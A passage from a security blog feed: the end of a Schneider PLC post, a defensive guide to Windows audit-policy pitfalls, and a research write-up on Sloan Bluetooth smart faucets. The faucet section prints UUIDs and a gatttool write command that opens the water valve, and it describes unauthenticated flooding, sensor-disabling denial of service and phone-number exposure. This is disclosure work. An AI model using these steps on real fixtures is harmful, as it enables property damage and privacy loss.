While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers.. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electrics advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERTs advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked the highest possible, instead of spreading those in many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

Default Domain Policy” linked at the top of the Active Directory domain

  • Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • Audit Logon” is set to “Success” (red highlighting)

Default Domain Controllers Policy” linked to the “Domain Controllers” organization unit

  • Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicywhich finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213–69AE-11D9-BED3–505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212–69AE-11D9-BED3–505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3–505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3–505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

By: Ben Smith
30 June 2021 at 13:03

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device ran in a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices are Sloan SmartFaucets including Optima EAF, Optima ETF/EBF, BASYS EFX (these require an external adapter) and Flushometers such as SOLIS and can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800–0000–1000–8000–00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801–0000–1000–8000–00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000–1000–8000–00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000–1000–8000–00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00–0000–1000–8000–00805f9b34fb
handle = 0x0004, char properties = 0x02, char value handle = 0x0005, uuid = 00002a01–0000–1000–8000–00805f9b34fb
handle = 0x00db, char properties = 0x08, char value handle = 0x00dc, uuid = f7bf3564-fb6d-4e53–88a4–5e37e0326063
handle = 0x00de, char properties = 0x04, char value handle = 0x00df, uuid = 984227f3–34fc-4045-a5d0–2c581f81a153

Once we reverse the Android app, we can hopefully find variable names that reference these UUIDs and determine their function.

One thing I’ve noticed while doing this is that the device seems to stop beaconing every so often, and I need to either press a button on it OR wait a bit OR unseat and reseat the batteries. It’s possible that it limits connections over a period of time.

Let’s take a look back at the app.

SmartConnect Again

After pulling the app off of my phone using adb and then reversing it with jadx, I start searching for interesting bits. The first one to jump out was:

public final void dispenseWater() {
    if (getMainViewModel().getConnectionState().getValue() == ConnectionState.CONNECTED) {
getMainViewModel() .getConnectionState() .setValue (ConnectionState.DISPENSING_WATER);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = getMainViewModel().getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE));
        if (bluetoothGattCharacteristic != null) {
bluetoothGattCharacteristic.setValue(""1"");
        }
        FragmentActivity activity = getActivity();
        if (activity != null) {
            BluetoothLeService bluetoothLeService = ((MainActivity) activity).getBluetoothLeService();
            if (bluetoothLeService != null) {
bluetoothLeService. writeCharacteristic(bluetoothGattCharacteristic);
                return;
            }
            return;
        }
        throw new TypeCastException(""null cannot be cast to non-null type com.smartwave.sloanconnect.MainActivity"");
    }
}

Seems like it’ll be pretty easy to make this thing flow. Now we just need to figure out the BLE characteristic UUID referenced by UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. This is made incredibly easy thanks to a nice table of UUID variables.

public static final String UUID_CHARACTERISTIC_APP_IDENTIFICATION_PASS_CODE = “d0aba888-fb10–4dc9–9b17-bdd8f490c954”;
UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLUSH_ON_OFF = “d0aba888-fb10–4dc9–9b17-bdd8f490c946”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c942”;
public static final String
UUID_CHARACTERISTIC_FAUCET_BD_STATISTICS_INFO_NUMBER_OF_ALL_FLUSHES = “d0aba888-fb10–4dc9–9b17-bdd8f490c916”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_CHANGED_SETTING_LOG_PHONE_OF_LAST_FLUSH_VOLUME_CHANGE = “f89f13e7–83f8–4b7c-9e8b-364576d88334”;
public static final String
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Wow. In addition to finding our water dispensing UUID, there are a lot of other interesting variable names. A select few of ~100 are shown above. It looks like this thing supports over-the-air (OTA) firmware updates, tons of diagnostic and sensor settings, possible security settings, and more.

Now that we know the UUID that turns on the water, let’s use NRF Connect to see what we can do. I’m switching over to NRF Connect from gatttool because it handles the connection easily. Since the faucet seems to ‘time out’ or disallow connections after a period of time, this is useful so we don’t lose our connection and reset everything.

The faucet’s BLE advertising information
nRF Connect for Desktop showing the faucet’s Services

In the decompiled ‘dispenseWater()’ function above, we saw that the function basically sends a ‘1’ to the UUID stored in the variable UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE. Luckily we can find the UUID in the table we found:

public static final String UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE = “d0aba888-fb10–4dc9–9b17-bdd8f490c965”;

Cool. Let’s write to that UUID. The default value is 30, so, ‘0’ in ASCII. Let’s write 31, or ‘1’, since that’s what the code does. I tried writing other numbers first but nothing else did anything, until…

nRF Connect view showing flow being enabled.

I barely refrained from yelping for joy when I heard the faucet’s telltale ‘click’ indicating the spigot had activated. Since the faucet isn’t hooked up to a water source (hey, i’m not a plumber), you’ll have to bear with the above anti-climactic demo.

We should be able to do this with gatttool via:

$ sudo gatttool -b 08:6B:D7:20:00:01 — char-write-req -a 0x00b3 -n 31

Flush Toilet

Although I don’t have a smart Flushometer, it works very similarly to the faucet. We can see the code for “flushToilet()” is almost identical:

public static final void flushToilet(BluetoothLeService bluetoothLeService, MainViewModel mainViewModel) {
    Intrinsics.checkParameterIsNotNull(bluetoothLeService, "$this$flushToilet");
    Intrinsics.checkParameterIsNotNull(mainViewModel, "mainViewModel");
    if (mainViewModel.getConnectionState().getValue() != ConnectionState.FLUSHING_TOILET) {
        mainViewModel .getConnectionState() .setValue(ConnectionState.FLUSHING_TOILET);
        BluetoothGattCharacteristic bluetoothGattCharacteristic = mainViewModel.getGattCharacteristics().get(UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE));
        if (bluetoothGattCharacteristic != null) {
            bluetoothGattCharacteristic.setValue("1");
        }
        bluetoothLeService .writeCharacteristic(bluetoothGattCharacteristic);
    }
}

And we can look up the UUID for the flush variable:

public static final String UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = “f89f13e7–83f8–4b7c-9e8b-364576d88361”;

Even though I don’t intend to acquire a smart Flushometer, I can confidently say I know what’s happening here.

Unlock Key

There seems to be a concept of an unlock key in the android app.

public final void setGattCharacteristics(List<? extends BluetoothGattService> list) {
    DeviceData value;
    if (list != null) {
        for (T t : list) {
            Timber.i(“Service: “ + t.getUuid(), new Object[0]);
            List<BluetoothGattCharacteristic> characteristics = t.getCharacteristics();
            Intrinsics .checkExpressionValueIsNotNull(characteristics, “service.characteristics”);
            for (T t2 : characteristics) {
                Map<UUID, BluetoothGattCharacteristic> map = this.gattCharacteristics;
                Intrinsics.checkExpressionValueIsNotNull(t2, “characteristic”);
                UUID uuid = t2.getUuid();
                Intrinsics.checkExpressionValueIsNotNull(uuid, “characteristic.uuid”);
                map.put(uuid, t2);
                if (Intrinsics.areEqual(t2.getUuid(), UUID.fromString(GattAttributesKt.UUID_CHARACTERISTIC_APP_IDENTIFICATION_UNLOCK_KEY)) && (value = this.activeDeviceData.getValue()) != null) {
                    value.setHasSecurity(true);
                }
            }
        }
    }
}

The setGattCharacteristics function is called on connection to build the list of services and characteristics. Here, if there’s an unlock key set, the app marks a ‘security’ value as true. Later on this value is checked when a few functions are called, but so far it looks like it just appends some notes if it is set. In a few scenarios, a beginSecurityProtocol() function is called, and it will read a ‘note’ from the device if security is enabled. This ‘note’ can be used to store the phone number of the last person to change the setting. The security function seems to be more of a way to keep some data about what happened than any sort of actual security.

Flow Rate

The app has two different sets of code to protect flow rate from being set too high, depending on if we’re using Liters or Gallons.

if (doubleOrNull != null) {
    d = doubleOrNull.doubleValue();
}
if ((valueOf.length() == 0) || d < 1.3d) {
    d = 1.3d;
} else if (d > 9.9d) {
    d = 9.9d;
}
#OR:
if ((valueOf.length() == 0) || d < 0.3d) {
    d = 0.3d;
} else if (d > 2.6d) {
    d = 2.6d;
}

Since this is implemented in the app, I’ll bet the faucet has a much wider range. Of course, flow rate is governed by whatever the line in can support (I’m not a plumber). Flow rate is governed by d0aba888-fb10–4dc9–9b17-bdd8f490c949 characteristic.

Flow Rate Value

It seems floats are written to the characteristic as two characters, in this case, 1 and 9 (1.9), which is one of the liters per minute (LPM) options. Let’s see what we can set it to.

So, we can’t set it to a 3 byte value, but we can set it to 0x3939 (9.9), and that seems to be the highest value to have any effect. Of note, we can also set it to even higher values like 0xFF39, and while that doesn’t seem to do anything, it still feels like a value that shouldn’t be allowed by logic on the device. Since I don’t have the faucet hooked up, I can’t test what happens when we set the flow rate really high (again, not a plumber). When it’s set to FF39, the app tries to display it as 0.0. And, we can set it to 9.9 via the app. So, Unless we plug this thing into a water line, we’re not gonna know what happens with the FF39.

Activation Mode

“Activation Mode” controls how long water flows for when the IR sensor is triggered. We can set it up to 120 seconds via the app. We’re all washing our hands a lot longer during covid, but I know I can sing happy birthday to myself 2 or three times and still be under that 2 minute mark. Can we set it higher and cause the faucet to flow for a really long time?

There are two types of Activation Mode: Metered and On Demand. What’s the difference between them? Surely the internet will tell me.

A Google Play Store comment indicating confusion on Metered and On Demand flow rate

Nope, no luck there. There are a few variable definitions that may give us a clue. Could that On Demand value be a mistake, off by an order of magnitude?

public final class ActivationModeFragmentKt {
    private static final int METERED_MAX_VALUE = 120;
    public static final int METERED_MODE = 1;
    private static final int MIN_VALUE = 3;
    private static final int ON_DEMAND_MAX_VALUE = 1200;
    public static final int ON_DEMAND_MODE = 0;
}

Unfortunately those safeguards don’t seem to be set anywhere else. Let’s see if we can find the code that controls this. Two different characteristics control the run times for the different modes.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c945”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME = “d0aba888-fb10–4dc9–9b17-bdd8f490c944”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION = “d0aba888-fb10–4dc9–9b17-bdd8f490c943”;
Flow Rate characteristics and values

And we can see how these are set on the device. I’m going to go ahead and assume that everything on this device is written as ascii. So, Mode is set to 0x30 == “0”, which we can see is ON_DEMAND_MODE. And then the Metered Run Time is set to 120 seconds, and On Demand is set to 30 seconds. Cool. Let’s see how high we can go. This is going to be painful, waiting for many minutes for this thing to turn back off.

The On Demand characteristic set to 1130 seconds

Ok, we’ve set the On Demand time to 1130 seconds, so, about 18 minutes. I wave my hand in front of the faucet’s IR sensor, and grab a cup of coffee. This is gonna take a while…. That didn’t work. It shut off quickly. There must be some internal idea of how long is too long. I’ll flip the mode to metered and set that pretty high. Seems metered won’t take more than 3 bytes, so I’ll set the first one to 9 for 920 seconds, or ~15 minutes. And then I’ll wait.

Metered Mode set to 920 seconds

It’s still going. There’s gotta be a better way to test. Currently, I wave my hand in front of the sensor once to engage the faucet, and then try periodically over the timer duration. It won’t make the click of engagement until the time is up. So, the next time I can wave my hand in front of the sensor and hear a click, I know the faucet’s timer has ended. This won’t be incredibly accurate or scientific. I set a 14 min timer and walked away. Annnnd somehow I walked right back in at the 15 minute mark and heard it click off. So, the highest value we can likely set for Metered mode is 999, which is 16.65 minutes. That’s a long time to leave the tap on. I wonder who would want to do something like that…

Wet Bandits — Be on the lookout — These criminals are armed and clumsy

DoS

In addition to causing a flood, we can trigger the opposite effect. It’s possible to disable the faucet’s sensor completely by setting the Sensor Range to 0. Now, the faucet won’t turn on no matter how close our hand gets or how vigorously we wave. In this case, we can simply send an 0x30 to UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE.

Model and Version

It’s also possible to read the model and version number via these characteristics. Nothing super exciting here, but could be useful if we were trying to find a specific version. Most BLE enabled devices will expose these via the “Device Information” service. These are separate from that and something Sloan must have thought necessary.

Firmware & Hardware
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c906”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c905”;

Firmware: 0109

Hardware: 0175

Logged Phone Numbers

The “security” mode of the faucet logs the phone number stored in the app for certain events.

public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_BD_NOTE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c932”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_INTERVAL_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c930”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_ON_OFF_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92e”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_FLUSH_TIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92f”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_FACTORY_RESET = “d0aba888-fb10–4dc9–9b17-bdd8f490c929”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_OD_OR_M_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92b”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_LAST_RANGE_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92a”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_METER_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92c”;
public static final String UUID_CHARACTERISTIC_FAUCET_BD_CHANGED_SETTING_LOG_PHONE_OF_OD_RUNTIME_CHANGE = “d0aba888-fb10–4dc9–9b17-bdd8f490c92d”;
Phone numbers stored on faucet

I’ve conveniently set these to the Tenable support number 855–267–7044. In a real setup, this would be the phone number registered in the app that performed each specific task update. I attempted to see how wide the field was, and got up to 15 characters before it wouldn’t take any more.

It doesn’t seem like the app is parsing anything in the text fields, so no XSS that I can find.

The other interesting thing here is that any time someone makes a change to the faucet, the app causes their phone number to be stored on the faucet. This is then reflected back to any app that connects OR anyone that reads the characteristic. This isn’t mentioned in the app and I don’t see a privacy policy. Does GDPR apply to bathroom fixtures?

Aquis Dongle

What is Aquis? I don’t know. But there are several characteristics in the app for an Aquis Dongle. Could this be a new product line? A partnership with another company that this app will work with?

public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_FIRMWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90e”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_HARDWARE_VERSION = “d0aba888-fb10–4dc9–9b17-bdd8f490c90d”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_MANUFACTURING_DATE = “d0aba888-fb10–4dc9–9b17-bdd8f490c90c”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SERIAL = “d0aba888-fb10–4dc9–9b17-bdd8f490c90b”;
public static final String UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AQUIS_DONGLE_SKU = “d0aba888-fb10–4dc9–9b17-bdd8f490c90F”;

There does seem to be a company called Aquis that offers connected faucets. Perhaps they’re one of Sloan’s partners or produced the tech for Sloan.

Aquis Multifunctional Faucet feature sheet

That ‘optional service APP’ sounds just like what we’re looking at.

OTA Firmware Update

The service UUID 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0 maps to the variable name UUID_SERVICE_OTA in our variable definitions file. Indeed, a quick search reveals this to be Silicon Labs OTA service, giving us insight, also, into the chipset used here. We’ll have to dig into this.

OTA means “Over-The-Air” and is the method to write firmware to various BLE chipsets. As far as I can tell, the different major chipset manufacturers each have their own OTA spec, and they are not interoperable even if they’re called the same thing. Therefore it can be helpful to have chipset specific tools to manipulate OTA. There are often various levels of security that can be added by the developer, including checking firmware signatures or not.

Silicon Labs Gecko bootloader has 3 optional settings for secure firmware update:

  • Require signed firmware upgrade files.
  • Require encrypted firmware upgrade files.
  • Enable secure boot.

Silicon Labs defines these as:

